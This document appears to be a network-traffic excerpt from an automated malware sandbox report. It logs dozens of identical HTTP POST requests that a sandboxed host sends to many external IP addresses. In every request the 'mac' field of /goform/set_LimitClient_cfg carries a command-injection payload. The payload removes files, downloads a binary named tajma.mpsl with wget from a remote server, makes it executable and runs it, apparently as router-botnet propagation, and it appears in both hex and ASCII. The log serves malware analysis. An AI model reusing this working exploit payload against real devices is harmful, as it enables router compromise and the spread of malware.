                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1991192.168.2.235529654.58.74.2238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436558962 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1992192.168.2.2350074206.208.111.218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436595917 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1993192.168.2.2345360164.187.254.08080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436620951 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1994192.168.2.2334160185.196.40.278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436749935 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1995192.168.2.2345324146.72.143.2498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436796904 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1996192.168.2.235761279.48.84.2178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436821938 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1997192.168.2.234706259.32.202.1998080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436839104 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1998192.168.2.2357682201.190.88.2498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436893940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1999192.168.2.2342576161.108.101.1228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436917067 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2000192.168.2.2348280107.47.105.2518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436984062 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2001192.168.2.2333654115.206.216.2308080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436990976 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2002192.168.2.2347870122.206.210.2518080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437026978 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2003192.168.2.235635634.38.74.1768080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437047958 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2004192.168.2.2348054206.195.200.338080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437216997 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2005192.168.2.2339530187.11.140.2078080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437232971 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2006192.168.2.233908627.113.183.118080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437258959 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2007192.168.2.2356018115.79.118.848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437289953 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2008192.168.2.2354148140.188.148.928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437335014 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2009192.168.2.2351462134.5.163.138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437359095 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2010192.168.2.2349108139.44.110.1408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437382936 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2011192.168.2.2357736189.137.11.58080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437395096 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2012192.168.2.2360650107.34.189.2268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437447071 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2013192.168.2.2342446163.17.125.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437469959 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
